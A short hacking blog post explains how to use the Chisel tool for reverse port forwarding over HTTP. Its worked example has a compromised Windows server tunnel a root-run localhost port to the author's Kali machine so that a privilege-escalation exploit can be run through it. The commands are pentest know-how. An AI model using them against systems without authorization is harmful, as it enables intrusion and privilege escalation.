u915

Daniel Cano Merchán - Hacking & Tech

Port forwarding with Chisel over HTTP

2020-09-23 #Hacking

This time i want to talk about Chisel an amazing tool written in Go, simple to use and multi OS which enable port forwarding over HTTP. This post are just minimal notes of how to use Chisel with a practical example.

Getting Chisel and more info

Source code and full documentation about Chisel can be found on Github.

There are precompiled binaries under the path releases: Chisel releases.

Port forwarding

Two modes needed, client and server, example with two machines.

machine 1: Deploying the server

chisel server -p PORT --reverse

machine 2: Connecting to the Chisel server

chisel client IP_SERVER_CHISEL:PORT_SERVER_CHISEL R:PORT1:IP:PORT2

Practical example

There is a remote server cracked with a low privileged account, and we want to use a certain exploit with our machine for practical reasons, like there is not Python inside the server and there is a hard way to make the exploit work precompiling the source.

Another example can be redirect the cracked server local port to be viewed on our local machine, there are infinity reasons.

In the example, inside the cracked machine this time there is a service running with root privileges on the port 8080, deployed only on the localhost network 127.0.0.1 and we know a exploit to escalate priveleges.

Deploying the Chisel server on the pentest machine using the precompiled version for Linux:

./chisel server -p 9003 --reverse
2020/09/23 09:16:55 server: Reverse tunnelling enabled
2020/09/23 09:16:55 server: Fingerprint XXXXXXXXXXXXX
2020/09/23 09:16:55 server: Listening on 0.0.0.0:9003...

So this time a VM with Kali is listening on the port 9003 and awaiting remote connections to the port 9003.

–reverse, Allow clients to specify reverse port forwarding remotes in addition to normal remotes.

On the remote server, Windows, starting a precompiled Chisel and reverse connecting the (remote)localhost port 8080 with the port 8080 on the Kali machine:

.\chisel.exe client 1.2.3.4:9003 R:8080:127.0.0.1:8080
2020/09/23 09:17:08 client: Connecting to ws://1.2.3.4:9003
2020/09/23 09:17:08 client: Fingerprint XXXXXXXXXXXXX
2020/09/23 09:17:09 client: Connected (Latency 47.968ms)

Now the (remote)localhost port 8080 can be accesed on Kali and is reverse connected with the port 8080 on the Windows machine.

The port 8080 can be used directly against the local network on Kali and will impact to the Windows remote server, so it is possible to use the exploit in a way like that:

python exploit.py 127.0.0.1 8080

Happy hacking